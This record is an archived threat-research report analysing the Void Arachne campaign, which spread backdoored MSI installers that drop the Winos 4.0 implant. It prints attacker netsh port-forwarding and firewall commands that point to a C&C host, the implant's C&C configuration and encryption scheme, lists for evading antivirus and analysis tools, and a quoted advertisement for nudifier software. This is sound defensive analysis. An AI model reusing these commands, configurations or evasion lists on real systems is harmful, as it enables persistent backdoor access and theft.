{
	"id": "f16b0782-e026-470b-97e3-f637334d9391",
	"created_at": "2026-04-06T00:18:32.492454Z",
	"updated_at": "2026-04-10T03:29:06.994098Z",
	"deleted_at": null,
	"sha1_hash": "559df6500e93585b43c1e49e675474634efd3d61",
	"title": "Behind the Great Wall: Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 C\u0026C Framework",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6634302,
	"plain_text": "Behind the Great Wall: Void Arachne Targets Chinese-Speaking Users\r\nWith the Winos 4.0 C\u0026C Framework\r\nPublished: 2024-06-19 · Archived: 2026-04-05 16:02:55 UTC\r\nReport highlights:\r\nWe recently discovered a new threat actor group that we dubbed Void Arachne. This group targets Chinese-speaking\r\nusers with malicious Windows Installer (MSI) files in a recent campaign. These MSI files contain legitimate software\r\ninstaller files for AI software and other popular software but are bundled with malicious Winos payloads.\r\nThe campaign also promotes compromised MSI files embedded with nudifiers and deepfake pornography-generating\r\nsoftware, as well as AI voice and facial technologies.\r\nThe campaign uses SEO poisoning tactics and social media and messaging platforms to distribute malware.\r\nThe malware installs a Winos backdoor during the installation process, which could lead to a full system\r\ncompromise.\r\nDue to strict government control in China, VPN services and public interest in this technology have notably\r\nincreased. And in this Void Arachne campaign, we’ve observed how threat actors are exploiting the heightened public\r\ninterest in software that can evade the Great Firewall and online censorship.\r\nIn early April, we discovered that a new threat actor group (which we call Void Arachne) was targeting Chinese-speaking\r\nusers. Void Arachne’s campaign involves the use of malicious MSI files that contain legitimate software installer files for\r\nartificial intelligence (AI) software as well as other popular software. The malicious Winos payloads are bundled alongside\r\nnudifiers and deepfake pornography-generating AI software, voice-and-face-swapping AI software, zh-CN (Simplified\r\nChinese) language packs, the simplified Chinese version of Google Chrome, and Chinese-marketed virtual private networks\r\n(VPNs), such as LetsVPN and QuickVPN. 
During the process of installation, a Winos backdoor is also installed, which could lead to full system compromise.\r\nDuring this campaign, we observed numerous malicious installer files being shared across several Telegram channels. We also saw attacker-controlled web servers that distribute malicious files through search engine optimization (SEO) poisoning attacks. These MSI files act as backdoored installers, serving both the non-malicious software and the Winos 4.0 command-and-control (C\u0026C) framework implant, which could lead to a full system compromise. Winos (not to be confused with the Windows operating system) is a backdoor used by Chinese threat actors with an extensive array of capabilities for remotely controlling a compromised computer.\r\nAttack diagram\r\nInitial access\r\nWe observed multiple initial access vectors that the Void Arachne threat actor group uses to distribute malware across the web and through social media platforms. These distribution methods include an infrastructure staged for SEO poisoning and malicious package distribution across Chinese-language-themed Telegram channels.\r\nSEO poisoning (T1608.006)\r\nFor this campaign, Void Arachne set up a web infrastructure used for SEO poisoning that deploys spear-phishing links (T1566.002) disguised as legitimate software installers to lure potential victims. These links are hosted on web servers disguised as legitimate websites so that the Void Arachne threat group can proceed to make them rank high on search engines via SEO poisoning. 
\r\nhttps://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html\r\nPage 1 of 30\n\nFigure 2. An attacker-controlled website that hosts a malicious payload\r\nThese links contain MSI installers for common software targeting Chinese-speaking users such as Google Chrome, Chinese language packs for popular software, and VPNs such as LetsVPN and 快連VPN (also known as Quick VPN or Kuilian VPN). When these malicious MSI files or archive files are downloaded and executed, they bootstrap the infection process. To the victim, it appears as if the intended software was installed. However, unbeknownst to them, additional malware is installed that beacons back to the attacker’s C\u0026C server.\r\nBecause MSI files are bundled software installers, threat actors can include backdoors and additional malware within the file bundle that are executed without the end user’s knowledge during the installation process.\r\nIn this campaign, the Void Arachne group created subdomains of the domain webcamcn[.]xyz to act as C\u0026C servers for the various MSI files. As the campaign progressed, various subdomains were added to this root domain.\r\nTargeting VPN-related technologies for spearphishing\r\nInternet connectivity in the People’s Republic of China is subject to strict regulation through a combination of legislative measures and technological controls collectively known as the Great Firewall of China. Due to strict government control, VPN services and public interest in this technology have notably increased. This has, in turn, enhanced threat actors' interest in exploiting the heightened public interest in software that can evade the Great Firewall and online censorship.\r\nFigure 3. 
VPN advertising services that can “overcome” the Great Firewall of China\r\nWe discovered that the VPN “快連VPN” is a common phishing and SEO poisoning vector used to target Chinese speakers and the broader East Asian community. We have evidence of multiple distinct Chinese-speaking threat actors creating spear-phishing links and using SEO poisoning tactics by bundling this VPN with malware that includes Gh0st RAT and its variants.\r\nSpearphishing through Telegram\r\nWe observed several Telegram channels, some of which had tens of thousands of Chinese-speaking users, advertising malicious archives and MSI files as an additional distribution method. The malicious packages are in what appear to be Simplified Chinese language packs for Telegram as well as various AI tools.\r\nVPN-related Telegram channels\r\nLike what’s being promoted in Void Arachne’s SEO poisoning campaign, we also observed the same malicious MSI files being shared in Chinese language-centric Telegram channels. These channels are all related to VPN technology, and the malicious MSI files were shared across several of them.\r\nFigure 4. A pinned Telegram message containing a malicious MSI file embedded in a zip file\r\nThis is similar to other campaigns we’ve observed wherein after threat actors conduct SEO-poisoning tactics, they then share links to these malicious sites or upload related files on social media and messaging applications.\r\nMalicious Simplified Chinese language packs for Telegram\r\nA common malicious software package we observed is what appears to be a Telegram language pack for the Simplified Chinese language. 
(Telegram does offer a translation of its app in Simplified Chinese.)\r\nFigure 5. A malicious MSI file masquerading as a Simplified Chinese language pack for Telegram\r\nUsing infected language packs as an infection vector is an interesting method, especially for the Chinese language, which has an estimated 1.3 billion native speakers. Some applications require language packs for a more localized user experience in regional markets, leaving these users potentially vulnerable to this kind of attack.\r\nNudifier AI technologies promoted on Telegram channels\r\nA concerning trend we have recently observed is the mass proliferation of nudifier applications that abuse AI to create AI-generated nonconsensual deepfake pornography. These images and videos are often used in sextortion schemes for further abuse, victim harassment, and financial gain.\r\nFigure 6. A deepfake pornographic video sample shared on the threat actor’s Telegram channel\r\nFigure 6 shows a screenshot of a video on the Void Arachne Telegram channel where a photo of a woman was used to generate a deepfake pornographic video using AI technology.\r\nFigure 7. An infected nudifier application shared on the Void Arachne Telegram channel\r\nWe’ve observed that the threat actors pinned the malicious MSI file to the top of their Telegram channels to increase the chances of infecting users who are interested in using this type of technology.\r\nFigure 8. 
A pinned message on Void Arachne’s Telegram channel featuring a malicious MSI file for an AI-powered app\r\nThe malicious installer files are advertised on social media and Telegram channels and are intended to lure unsuspecting victims, potentially even minors. Based on an initial Simplified Chinese to English translation of their advertisement via Google Translate, the malicious actors are also targeting young individuals who are still in school with their use of the phrase “female classmate.”\r\nJust have appropriate entertainment and satisfy your own lustful desires. Do not send it to the other party or harass the other party. Once you call the police, you will be in constant trouble! AI takes off clothes, you give me photos and I will make pictures for you. Do you want to see the female classmate you yearn for, the female colleague you have a crush on, the relatives and friends you eat and live with at home? Do you want to see them naked? Now you can realize your dream, you can see them naked and lustful for a pack of cigarette money.\r\nA Simplified Chinese to English translation of an advertisement that promotes nudifiers or deepfake pornography-generating software on the threat actor’s Telegram channel\r\nVoid Arachne also advertised AI technologies that could be used for virtual kidnapping, which is a novel deception campaign that uses misinformation through AI voice-altering technology to pressure victims into paying ransom.\r\nVoice-altering and face-swapping AI technologies promoted on Telegram\r\nIn addition to fake nudifier applications, we saw additional channels advertising face-swapping and voice-changing software. 
Like the rise of nudifiers and deepfake-generating applications, we have also observed the rise of AI-powered apps that have face-swapping and voice-altering capabilities.\r\nFigure 9. A screenshot of the Void Arachne Telegram channel advertising face-swapping applications\r\nWe’ve found that malicious MSI files were shared and pinned on various AI video and voice manipulation Telegram channels.\r\nFigure 10 shows a screen capture of a threat actor video posted on Void Arachne’s Telegram channel wherein the malicious actor can be seen using AI face- and voice-cloning technology on a WhatsApp call. Figure 12, on the other hand, shows a malicious voice-altering and face-swapping AI app installer on Telegram.\r\nFigure 10. A screen capture of a video posted on a Telegram channel wherein the threat actor uses AI face- and voice-cloning technology on a WhatsApp call\r\nFigure 11. An infected voice-changing and face-swapping AI app installer on Telegram\r\nTechnical analysis\r\nLetvpn MSI analysis\r\nName: Letvpn.msi\r\nSHA256: fae4f96beda54a1ed4914537b0542182d3a020dd9db9d9995df37d303b88e6df\r\nSize: 27.05 MB\r\nType: Windows Installer\r\nThis section discusses our analysis of the malicious files associated with Void Arachne’s campaign, starting with the letvpn.msi file.\r\nThe malicious MSI file uses Dynamic Link Libraries (DLLs) during the installation process. These DLLs play a pivotal role during runtime, facilitating various essential operations including property management within MSI packages, scheduling tasks, and configuring firewall rules.\r\nFigure 12. 
MSI binary table that shows embedded DLLs\r\nFigure 13. MSI action table\r\nThe MSI file performs several tasks, such as creating scheduled tasks and configuring firewall parameters. Specifically, we have observed the creation and configuration of firewall rules via the OnFwConfig and OnFwInstall functions from NetFirewall.dll, which are designed to whitelist both inbound and outbound traffic associated with the malware for the public network profile only.\r\nFigure 14. Firewall rule addition\r\nFigure 15. Firewall rule creation\r\nFigure 16 shows the configuration of the inbound firewall rule created to enable unrestricted access for the malware when connected to public networks, ensuring that the malware can operate without interruption.\r\nFigure 16. Inbound firewall rule configuration\r\nFurthermore, letvpn.msi drops multiple hidden files, including the LetsPro.exe loader, within the designated directory path C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\. Subsequently, it initiates the execution of the LetsPRO loader.\r\nFile name | Size | MD5 hash | Parent directory\r\n1 | 9996288 | D82362C15DDB7206010B8FCEC7F611C5 | C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VGX\\app-3.4.0\r\nLetsPRO.exe (Loader) | 40960 | FE7AEDAB70A5A58EFB84E6CB988D67A4 | C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VGX\\app-3.4.0\r\nLetsPRO.exe | 247272 | 7BB188DFEE179CBDE884A0E7D127B074 | C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VGX\r\nTable 1. 
Sample of files dropped by LetsPro.msi\r\nTrojan loader LetsPro.exe analysis\r\nName: LetsPRO.exe\r\nSHA256: 768881a43d2ffd9701bf2e241a1d59d8a0c116cf20e27a632a8b087bb81de409\r\nCompilation time: 2024-02-03 3:59:52 a.m.\r\nSize: 40.00 KB\r\nCompiler: Microsoft Visual C/C++ (2003 v.7.1 (3052-9782)) [EXE32]\r\nType: EXE\r\nLetsPro.exe is a trojan loader that decrypts, maps, and executes a second-stage payload in memory. The loader first reads and loads the content of a file named “1”, with the following content structure:\r\nstruct payload_struct {\r\n    uint32_t flag;          // 1 if the data is encrypted, 0 if it's plaintext/memory clean up\r\n    uint32_t fileSize;      // Size of the encrypted data in bytes\r\n    char encryptedData[];   // The encrypted payload\r\n};\r\nFigure 17. File 1 content structure\r\nIt then identifies the encrypted data section within the file. The initial part of the file structure contains a flag set to 1, which indicates encryption. The loader uses the Rivest Cipher 4 (RC4) algorithm with the key \"0x678E0B00\" to decrypt this data. After decryption, the payload, which is now executable code, is mapped into the process's memory space and executed.\r\nThe decryption key structure is defined as follows:\r\nstruct decryption_key_struct {\r\n    uint32_t memory_cleanup; // Flag for memory cleanup after decryption\r\n    uint32_t keySize;        // Size of the decryption key\r\n    char key[];              // Decryption key\r\n};\r\nThe following code snippet demonstrates the core part of the loader logic:\r\nFigure 18. LetsPro.exe core logic\r\nThe following snippet demonstrates the decrypted file 1 structure in memory:\r\nFigure 19. 
File 1 decrypted content structure in memory\r\nSecond-stage loader analysis\r\nSHA256: 77c77e728b98a923bb057943d0b5765b79106c0378d72814cb3db69749abaebb\r\nSize: 15.77 MB\r\nCompilation time: 2024-05-11 08:02:23\r\nType: DLL\r\nAfter the second-stage loader (file “1”) is executed and loaded into memory, the malware drops a Visual Basic Script (VBScript) designed to automate the creation of a scheduled task within Windows Task Scheduler to achieve persistence. The VBScript file will create a new scheduled task and configure task settings to run when a user is logged on to execute a specified batch file. Additionally, the malware creates a Windows service whose name starts with CreateSvc_ to execute the VBScript file. At the time of research, the batch file was not available.\r\nFigure 20. VBScript sets up a scheduled task and configures properties\r\nFigure 21. VBScript adds an action to the scheduled task to execute a BAT file\r\nFigure 22. Scheduled task for executing the BAT file\r\nFigure 23. Service creation for VBScript execution\r\nAfter that, the malware replicates the loader, VBScript, and the file “1” within the user directory.\r\nFile name | Size | MD5 | Parent directory\r\n1 | 9996288 | D82362C15DDB7206010B8FCEC7F611C5 | C:\\Users\\%USERNAME%\\\u003cRandom Directory Name\u003e\r\n792258.vbs | 2405 | CD95B5408531DC5342180A1BECE74757 | C:\\Users\\%USERNAME%\\\u003cRandom Directory Name\u003e\r\nLetsPRO.exe | 40960 | FE7AEDAB70A5A58EFB84E6CB988D67A4 | C:\\Users\\%USERNAME%\\\u003cRandom Directory Name\u003e\r\nTable 2. 
Sample of files dropped by 1\r\nThe malware also uses the netsh command to set up port forwarding and configure firewall rules named “Safe\u003cinteger\u003e” on the victim’s machine, thereby whitelisting inbound and outbound traffic related to the malware for all network profiles.\r\nIt establishes a rule for IPv4-to-IPv4 port forwarding. Specifically, it designates port 443 as the listening port on the local machine, where incoming connections will be received. It specifies a destination address (103[.]214[.]147[.]14[.]webcamcn[.]xyz), indicating where the forwarded traffic will be directed. Additionally, it designates port 443 on the destination server as the port to which the incoming traffic will be forwarded. This configuration redirects traffic from the local machine's port 443 to the specified destination address and port.\r\nnetsh interface portproxy add v4tov4 listenport=443 connectaddress=103[.]214[.]147[.]14[.]webcamcn[.]xyz connectport=443\r\nFigure 24. Configuring port forwarding\r\nnetsh advfirewall firewall add rule name=\"Safe1\" dir=in action=allow program=\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VGX\\app-3.4.0\\LetsPRO.exe\"\r\nFigure 25. Configuring firewall rule\r\nFigure 26. List of created firewall rules\r\nFinally, the malware passes the execution to the Winos 4.0 stager in memory.\r\nWinos 4.0 C\u0026C framework overview\r\nThe final payload of this attack is the Winos 4.0 implant, which is written in C++ and targets the Windows platform. Winos has features that include file management, distributed denial of service (DDoS) using TCP/UDP/ICMP/HTTP, full disk search, webcam control, and screen capturing. 
Additionally, it supports many other functions, including process injection, microphone recording, system and service management, remote shell access, and keylogging, further enhancing its ability to control and monitor the infected system.\r\nFigure 27. Winos 4.0 operator panel\r\nThe Winos C\u0026C server is equipped with 23 internal plugins, each compiled in both 32- and 64-bit versions, to execute a variety of tasks. Table 3 shows the complete list of these plugins, along with their respective SHA256 hashes:\r\nSimplified Chinese module names | Translated module names | SHA256 hash\r\n播放监听.dll | Play monitor.dll | 7ed8c7ea5e2feeadb1966f53c48ab3a580f53a4d20725031d764db7e962607a9\r\n查注册表.dll | check registry.dll | 49120dfcef430df1c90c9c370b92b969c876b9b4327d81eae720cd71fcd75b87\r\n差异屏幕.dll | difference screen.dll | 5f7e00017b16db29fa7cba60993d7af909ef41d3fe9d3f7ca9f693c1f7ef6d37\r\n代理映射.dll | proxy mapping.dll | 023822a8ad26f2d7330a2afa310ccf943058f2765b7cbc6975c51c144739b55f\r\n服务管理.dll | service management.dll | 3ac0afec0ce29b69d57c54663c6e4fa6fee703696069cb5b8f00783b5504cf80\r\n高速屏幕.dll | high-speed screen.dll | bc01cf528086de6a1b231dee01c1624cf58911b171904bf7a6b08ddfba661d83\r\n后台屏幕.dll | Background Screen.dll | 2066dd040fe020ca32e5ebfeeb4fa75094d3ac43155c83fe222f380d4940df42\r\n急速搜索.dll | Rapid Search.dll | 5759fc938f228579fc5e64e74cee083581a975d4054deb715c0f371b66b96263\r\n键盘记录.dll | Keylogger.dll | 976837663b25f793470f24925198b06e79a72ede014a84ba62311fadede5062f\r\n上线模块.exe (stager) | Online Module.dll | 436499efe94c7a1bfefaa84c52f8187bffb3d4d1a49de1cbc8885e7807d11b42\r\n上线模块.dll (stager) | Online Module.dll | 
5684fc4f33c168519b2fdcae59cc3be2e6db1f0b0f3718524ef57e0e7423f59d\r\n视频查看.dll | Video Viewing.dll | 7a3841a5315c01df299d8844b62dc150b1c3e5b5ebe7547c1a211349879659af\r\n视频查看.dll | Video Surveillance.dll | 7a3841a5315c01df299d8844b62dc150b1c3e5b5ebe7547c1a211349879659af\r\n文件管理.dll | File Management.dll | 5abc2006c7a3a27e033075ba881a668aba5e70797677ed2220f7ab9fb36fc927\r\n系统管理.dll | System Management.dll | 827ed4f36ea7032395bfa35da54c6e9d06d6633aa7396792e8511adf366c1fcc\r\n远程交谈.dll | Remote Communication.dll | c61c8ded2a9481c2e50b4872c8f7bcd8ecc33997a6004e62aa06b60742f54e57\r\n远程终端.dll | Remote Terminal.dll | 409e09ac0fcf7d39044ef0b3eb798aea6dc0650e5214056760694c1340fc8488\r\n注入管理.dll | Injection management.dll | ecf5394d78392b11daec1016c6b447f9da7eae69f7702ecf8c4d1d3f69e3fe64\r\n娱乐屏幕.dll | Entertainment Screen.dll | 6ce947e21128687ed37f247e297f29609251deed934b7b5722d27f4a1f72a90e\r\n压力测试.dll (DDOS module) | Stress Test.dll | 61d73a8920c41483d0832c9a5c5bc9f57ac5f71146a98faefc0cb4d988e77bab\r\n计划任务.dll | Scheduled Tasks.dll | 4791c23aff8a09061b76a05bb88ee37149995584a87aade236ea4eebab79ed1c\r\n登录模块.dll | LoginModule.dll | 16d3c176ca94c84b60e26981231bf59ebe75057ac10dd6f583ce65a3bed11dd0\r\n(shellcode) | - | b022e0f0b2ae9e27847cfc909bfcdbc89a732fcdde6e473443aaab2592a84910\r\nTable 3. Winos 4.0 internal plugins\r\nSimilar to Cobalt Strike and Sliver, Winos supports custom plugins that can be developed by a threat actor. This allows the tool to extend its capabilities and add custom functionality. 
During our investigation, we found the following external and custom plugins for Winos 4.0 in the wild:\r\nPlugin name in Chinese | Plugin name in English | SHA256 hash\r\n删除360急速安全账号密码.dll | Delete 360 Speed Security Account Password.dll | 03669424bdf8241a7ef7f8982cc3d0cf56280a5804f042961f3c6a111252f\r\n提权-EnableDebugPrivilege.dll | Elevate Privileges-EnableDebugPrivilege.dll | 11a96c107b8d4254722a35ab9a4d25974819de1ce8aa212e12cae393549\r\n体积膨胀.dll | Volume Expansion.dll | 186bf42bf48dc74ef12e369ca533422ce30a85791b6732016de079192f4a\r\n提权ShellExecuteEx.dll | Elevate Privileges-ShellExecuteEx.dll | 202c378deb628a8104a1dd957bbd70b945beea8e11d55b9ce3e4787fbe4\r\n删除sogou账号密码.dll | Delete Sogou Account Password.dll | 2d1904dfc5a555b8bfdd4fa2db46d532e19479fd99affb169449ff2a2a4b4\r\n提权-RtlAdjustPrivilege.dll | Elevate Privileges-RtlAdjustPrivilege.dll | 47dfa891fc347187ba4ac161980a7e7c47cf656ddbf7b269a74c32a5a136\r\n删除ie账号密码.dll | Delete IE Account Password.dll | 538382dc7a7839f125ffe08a854512b78fc4a657697227e53f832ae566ca\r\n提权-CreateProcessInSession0.dll | Elevate Privileges-CreateProcessInSession0.dll | 616c7270a21ecc9ccd880e04563343e9ac53cce88a77244388dbb1fc7bfa\r\n写启动目录.dll | Write to Startup Directory.dll | 61981a0324586ad83e6cb7015df91a6e4887537ad36a4674be82cb3cfcf5\r\n写注册表启动.dll | Write to Registry Startup.dll | d2e15264c786917a6cb194bf0cf586a69b8678c6d4d4c87cc14082d7b76\r\n删除自身.dll | Delete Itself.dll | 6ece1e12d50ade02bf424007a9b70b4a14580244a9a1f5cd32c0a129ec06\r\n内网主机扫描.dll | Internal Network Host Scan.dll | 6f5574d00ffce206525835f72ac083692a183e69114f1551b7ecb99dec3d\r\n解密数据.dll | Decrypt Data.dll | 6f923b94a614e61cbde73c5b09036b9482f3770c02161ecb0875dbb56bc\r\n删除chrome账号密码.dll | Delete Chrome Account Password.dll | fbc23b84b2c83e99ab1c5cb7075bd5d26b55dde4afc06eddc0471c6d6b2\r\n写计划任务.dll | Write Scheduled 
Task.dll | 65ac9f036b1d8a02e4c9041eeafc230562088e57f2535bd194e8bf592e62\r\n删除telegram账号密码.dll | Delete Telegram Account Password.dll | 2d1904dfc5a555b8bfdd4fa2db46d532e19479fd99affb169449ff2a2a4b4\r\n删除qq账号密码.dll | Delete QQ Account Password.dll | b71e6c4ff7c910dd666f442e98597f90bd2eb3fce4c8889af0ecc694f282b\r\n删除skype账号密码.dll | Delete Skype Account Password.dll | b396bfd7bec043cf402e04fa810983c93c79d1a632fd4558098e68eb144a\r\nTable 4. Winos 4.0 external plugins\r\nWinos 4.0 stager analysis\r\nFile name: 上线模块.dll (Online Module.dll)\r\nMagic: PE32 executable (DLL)\r\nSHA256: 2962bb303b949e4a0826c723ee4aee2df8cb0806653a8ca6daaa67fd06f37e6f\r\nCompiler: Microsoft Visual C/C++\r\nCompilation time: 2023-05-23 09:24:06\r\nSize: 109 KB\r\nType: DLL\r\nThe second-stage loader discussed earlier executes the Winos stager payload, 上线模块.dll/exe (which translates to Online Module.dll/exe). This module can be generated in both EXE and DLL formats. In this campaign, the attacker delivers a DLL implant. This module is responsible for downloading and executing the main implant, 登录模块.dll (which translates to LoginModule.dll), on an infected system.\r\nUpon execution, the stager reads and initializes its configuration. Notably, the configuration is in cleartext but is arranged in reverse order. The following is the fixed configuration setup:\r\n|p1:127.0.0.1|o1:443|t1:1|p2:103[.]214[.]147[.]14[.]webcamcn[.]xyz|o2:80|t2:1|p3:103[.]214[.]147[.]14[.]webcamcn[.]xyz|o3:80|t3:0|dd:1\r\n默认|bb:1.0|bz:2024. 
4.18|jp:0|bh:0|ll:0|dl:0|sh:0|kl:0|bd:0|\r\nTable 5 contains the stager’s configuration values and their descriptions.\r\nConfig | Description | Value\r\np1 | First C\u0026C address | 127.0.0.1\r\no1 | First C\u0026C port | 443\r\nt1 | Communication protocol (TCP/UDP) | 1 (TCP)\r\np2 | Second C\u0026C address | 103[.]214[.]147[.]14[.]webcamcn[.]xyz\r\no2 | Second C\u0026C port | 80\r\nt2 | Communication protocol (TCP/UDP) | 1 (TCP)\r\np3 | Third C\u0026C address (backup address in case p1 and p2 fail) | 103[.]214[.]147[.]14[.]webcamcn[.]xyz\r\no3 | Third port | 80\r\nt3 | Communication protocol (TCP/UDP) | 0 (UDP)\r\ndd | Implant execution delay in seconds | 1\r\ncl | C\u0026C communication interval (beaconing) in seconds | 1\r\nfz | Grouping | 默认 (Default)\r\nbb | Version | 1.0\r\nbz | Comment (default value is the implant generation time) | 2024. 4.18\r\njp | Keylogger | 0\r\nsx | Anti-VM | 0\r\nbh | End bluescreen | 0\r\nll | Antitraffic monitoring | 0\r\ndl | Entry point | 0\r\nsh | Process daemon | 0\r\nkl | Process hollowing | 0\r\nbd | - | 0\r\nTable 5. Winos 4.0 stager configuration values and descriptions\r\nTo communicate with its C\u0026C server, the malware first needs to generate an encryption key to secure the communication. To generate this key, the malware calls the timeGetTime() Windows API function, which returns the system time in milliseconds, and appends “00 00 00 00 ca 00” to it. The data that needs to be transferred is then encrypted with this key and appended after the key.\r\nFigure 28 is an example of an initial handshake between the stager and the C\u0026C server. The malware encrypts and sends the hardcoded value “04 00” to its C\u0026C server to indicate that this initial packet contains the key. 
The server then uses this session key for future communications.\r\nFigure 28. Winos 4.0 stager initial packet–encryption key exchange\r\nThe encryption algorithm begins by preparing a block of data and a key, adjusting the buffer to ensure that there is sufficient space to work with both. The key is then prepended to the data that needs to be encrypted. The algorithm proceeds with the encryption process, which involves a loop that processes each byte of data. For each byte, a specific byte from the key is selected and transformed by taking its modulus with a hardcoded value (0x1C8) and then adding another hardcoded value (0x36) to it. This transformed key byte is then XORed with the current byte of the data, and the resulting encrypted byte replaces the original byte in the data. Every ten bytes, the algorithm resets the pointer to the beginning of the key, ensuring that the key is reused cyclically.\r\nIt should be noted that, based on our analysis, the value 0x1C8 remained the same in all the samples used in this campaign and several other attacks. However, we have observed that some variants found in the wild use different values, such as 0x7C5, indicating that this value might change from sample to sample. The value 0x36, on the other hand, remained the same in all the variants we analyzed.\r\nFigure 29. Winos 4.0 stager data encryption\r\nNext, the C\u0026C server responds with a magic value of “04” and a unique 16-byte identifier in UTF-16 format. In some Winos variants, this identifier is the MD5 hash of the DLL module that will be downloaded. Figure 30 shows an example of the C\u0026C server response in network traffic.\r\nFigure 30. 
C\u0026C server response with a unique identifier to the initial packet\r\nFigure 31 shows a decrypted packet data section.\r\nFigure 31. Decrypted C\u0026C response with a unique identifier to the initial packet\r\nThe stager then sends the name of the next-stage payload plugin, 登录模块.dll (LoginModule.dll), to the C\u0026C server.\r\nFigure 32. The Winos 4.0 stager sends the next stager module name to the C\u0026C server (encrypted packet)\r\nFigure 33 shows the decrypted packet data section.\r\nFigure 33. The Winos stager sends the next stager module name to the C\u0026C (cleartext)\r\nThe C\u0026C server response contains the following information:\r\nModule name\r\nModule hash\r\nBinary loader shellcode\r\nDLL module binary file\r\nThe stager then saves the decrypted C\u0026C server response (the plugin and its configuration) into the Windows Registry. It uses the name \"d33f351a4aeea5e608853d1a56661059\" and stores it under the key path HKEY_CURRENT_USER\\Console\\0 for 32-bit plugins or HKEY_CURRENT_USER\\Console\\1 for 64-bit plugins.\r\nFigure 34. The Winos stager stores the module sent by the C\u0026C server in the registry\r\nFinally, to execute the module, the stager locates the shellcode section within the response received from the C\u0026C server at offset 0xA44 and transfers control to the shellcode.\r\nFigure 35. 
Module shellcode DLL loader\r\nWinos main implant analysis\r\nFile name 登录模块.dll (LoginModule.dll)\r\nMagic PE32 executable (DLL)\r\nSHA256 78f86c3581ae893e17873e857aff0f0a82dcaed192ad82cd40ad269372366590\r\nCompiler Microsoft Visual C/C++\r\nCompilation time 2023-05-23 09:24:23 UTC\r\nSize 195.00 KB (199680 bytes)\r\nType DLL\r\nThe 登录模块.dll (LoginModule.dll) is a fundamental component of Winos 4.0, serving as the core plugin manager for the\r\nsystem. This module is responsible for handling every action and command executed by the operator, which are transmitted\r\nvia the C\u0026C server as DLL plugins. These plugins extend the functionality of the implant.\r\nUpon receiving the response from the C\u0026C server, the implant stores these DLL plugins in the Windows registry paths\r\nHKEY_CURRENT_USER\\Console\\0 for 32-bit systems or HKEY_CURRENT_USER\\Console\\1 for 64-bit systems.\r\nSubsequently, the implant loads and uses these plugins to perform various tasks, enhancing its operational capabilities. This\r\nmodular approach allows for a highly flexible and extensible framework, enabling the efficient execution of diverse\r\nfunctions as required by the operator.\r\nOnce the 登录模块.dll (LoginModule.dll) plugin is downloaded, the execution of this module is based on the previously\r\nmentioned configuration. The malware creates a thread to collect clipboard data and keystrokes. It also employs a specific\r\nmutex for this thread, which is named 测试备注 (Test Notes).\r\nFigure 36. Code that shows mutex creation and clipboard data retrieval\r\nNext, the malware chooses one of the three available C\u0026C configurations. Before initiating the socket, it checks whether the\r\nanti-analysis feature is configured to run. 
If this feature is configured, the malware verifies the presence of monitoring\r\nsoftware by inspecting the window titles of running processes. If such software is detected, the malware enters sleep mode.\r\nFigure 37. Initializing socket with the C\u0026C server\r\nBelow is a list of monitoring software that the malware detects:\r\n流量（Flow）\r\nTaskExplorer\r\nWireshark\r\nFiddler\r\nProcess\r\nApateDNS\r\nCurrPorts\r\n任务管理器（Task manager）\r\n火绒（Tinder）\r\n提示符（Prompt）\r\nMalwarebytes\r\nPort\r\n资源监视器（Resource monitor）\r\nCapsa\r\nTCPEye\r\nMetascan\r\n网络分析（Network analysis）\r\nSniff\r\nThe malware collects system information from an infected machine, including the IP address, computer name, antivirus\r\nsoftware, operating system details, and hardware ID (HWID).\r\nFigure 38. System information-gathering code snippet\r\nTable 6 shows a list of targeted antivirus (AV) software.\r\nAV vendor Targeted AV process\r\n360 Total Security 360Safe.exe | 360Tray.exe | 360tray.exe | ZhuDongFangYu.exe | 360sd.exe\r\n金山（Jinshan） Kxetray.exe | KSafeTray.exe | kscan.exe | kwsprotect64.exe | kxescore.exe\r\nQQ QQPCRTP.exe | QMDL.exe | QMPersonalCenter.exe | QQPCPatch.exe | QQPCRealTimeSpeedup.exe | QQPCTray.exe | QQRepair.exe\r\nBaidu BaiduSd.exe | baiduSafeTray.exe\r\n江民（Jiang Min） KvMonXP.exe | RavMonD.exe\r\nQuickHeal QUHLPSVC.EXE\r\nMicrosoft MSE mssecess.exe\r\nComodo cfp.exe\r\nDR.WEB SPIDer.exe\r\nOutpost acs.exe\r\n安博士V3（Dr. An V3） V3Svc.exe\r\n韩国胶囊（Korean capsules） AYAgent.aye\r\nAVG avgwdsvc.exe\r\nF-Secure f-secure.exe\r\n卡巴（Kaba） avp.exe | avpui.exe\r\nMcAfee Mcshield.exe\r\nNOD32 egui.exe\r\n可牛（Ke Niu） knsdtray.exe\r\nTrend Micro TMBMSRV.exe\r\n小红伞（Red Umbrella） avcenter.exe\r\nNorton rtvscan.exe\r\nAvast ashDisp.exe\r\nPanda Antivirus Titanium remupd.exe\r\nBitDefender vsserv.exe\r\nPSafe PSafeSysTray.exe\r\nAd-watch ad-watch.exe\r\nK7 K7TSecurity.exe\r\nUnThreat UnThreat.exe\r\nTable 6. List of targeted antivirus software\r\nNext, the malware employs the encryption algorithm that we’ve previously discussed to encrypt all collected data. Using the\r\ntimeGetTime() Windows API function, a new key is generated to encrypt the collected data, which is different from the\r\nkey used during the stager’s initial request. The malware appends the hardcoded value “06 00” to the encryption key to\r\nindicate that this request contains collected data. Unlike the stager, LoginModule.dll doesn’t send the key in a separate\r\nrequest; instead, it prefixes the key to the collected data and sends this encrypted request to the C\u0026C server.\r\nFigure 39. Code snippet showing the encryption and transmission of collected information to the C\u0026C server\r\nFigure 40 shows the initial packet that the malware sends.\r\nFigure 40. Initial packet sent by 登录模块.dll (LoginModule.dll)\r\nFigure 41. 登录模块.dll (LoginModule.dll) decrypted initial traffic\r\nThe malware then begins to listen for incoming commands from the C\u0026C server. 
